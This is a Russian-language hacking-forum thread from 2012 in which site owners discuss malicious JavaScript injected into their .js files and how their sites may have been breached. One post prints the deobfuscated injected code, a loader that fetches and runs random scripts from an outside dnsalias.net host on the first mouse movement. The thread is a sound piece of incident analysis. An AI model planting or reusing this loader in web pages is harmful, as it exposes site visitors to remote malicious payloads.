Нашел у себя на сайте какую-то шнягу на JS.

Discussion in 'PHP' started by Darth Padla, 6 Mar 2012.

  1. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    что это за зараза?и как она туда попала?
    Похожая хня была во всех *.js

    http://pastebin.com/ATYCjzYY
     
    #1 Darth Padla, 6 Mar 2012
    Last edited by a moderator: 6 Mar 2012
  2. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Code:
    (function() {
    
    	var url = 'http://psaxxxbvww.dnsalias.net/g/';
    
    	if (typeof window.xyzflag === 'undefined') {
    
    		window.xyzflag = 0;
    
    	}
    
    	document.onmousemove = function() {
    
    		if (window.xyzflag === 0) {
    
    			window.xyzflag = 1;
    
    			var head = document.getElementsByTagName('head')[0];
    
    			var script = document.createElement('script');
    
    			script.type = 'text/javascript';
    
    			script.onreadystatechange = function () {
    
    				if (this.readyState == 'complete') {
    
    					window.xyzflag = 2;
    
    				}
    
    			};
    
    			script.onload = function() {
    
    				window.xyzflag = 2;
    
    			};
    
    			script.src = url + Math.random().toString().substring(3) + '.js';
    
    			head.appendChild(script);
    
    		}
    
    	};
    
    })();
     
    1 person likes this.
  3. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    ой спасибо,а где нибудь есть электронный переводчик?или вы настолько специально обученный,что вручную так шустро перевели?
     
  4. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    В данном случае было весьма просто, когда я заметил
    Code:
    eval(h5fef0b);
    eval заменил на alert и увидел код.
     
  5. lankaster1

    lankaster1 New Member

    Joined:
    5 Feb 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    То же самое

    Такой же код на своем сайте обнаружил. Как вычистить эту хрень?
     
  6. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Удалить.
     
  7. lankaster1

    lankaster1 New Member

    Joined:
    5 Feb 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Удалить не проблема, где гарантии что опять не появится. Хотелось бы выяснить что за новый вирус такой который только в ява скрипты лезет.
     
  8. demko

    demko New Member

    Joined:
    19 Nov 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    1
    lankaster1 вопрос не совсем корректный, ибо мб на сайте cms дырявая... и ещё куча возможных вариаций... так что гарантий никаких_))
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Единственная возможность на 100% защитить сайт от взлома - отключить его от интернета.
     
    1 person likes this.
  10. const

    const New Member

    Joined:
    7 Mar 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    И как, нашли в чём причина?
    У меня тоже сайты как минимум на четырёх хостингах сломали.
    Подозрения падают на жомлу
     
    #10 const, 7 Mar 2012
    Last edited: 8 Mar 2012
  11. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    НЕ,жумла тут ни при чем,у меня целиком самописные сайты-та же зараза.
    Это хостеров ломают
     
  12. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Ну это смотря что за сайт.
    Конечно как - проводил пен тест Expl0it то все возможно :)
     
  13. xek

    xek New Member

    Joined:
    10 Jul 2011
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Почитайте логи на ночь, может поможет )
    Если ОС на хостинге windows, а веб-сервер nginx с версией 1.2.0 или меньше, то возможно вас поимели через это
     
  14. const

    const New Member

    Joined:
    7 Mar 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Читал логи, ничего подозрительного. Возможно, изменения производились по ftp. На многих хостингах использовался sftp, вряд ли пароли отсниффили. И пароли были довольно сложные.
     
    #14 const, 9 Jun 2012
    Last edited: 10 Jun 2012
  15. Art!P

    Art!P Elder - Старейшина

    Joined:
    22 Jan 2008
    Messages:
    169
    Likes Received:
    28
    Reputations:
    5
    чувак это троянчик
     
  16. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    кстати,на каком хостинге эта зараза была?страна должна знать своих героев.
    у меня хостинг центр
     
  17. Jakeroid

    Jakeroid Member

    Joined:
    9 May 2009
    Messages:
    199
    Likes Received:
    12
    Reputations:
    1
    Вы уверены, что ваши самописные сайты абсолютно безопасны?
     
  18. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    странно как-то логи ты читал. логи ftp явно даже и не открывал.
     
  19. const

    const New Member

    Joined:
    7 Mar 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Это же хостинги, кто мне даст логи ftp?
     
  20. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    один из них представлял собой одинокую хтмль страничку с одиноким файлом .js и больше ничего.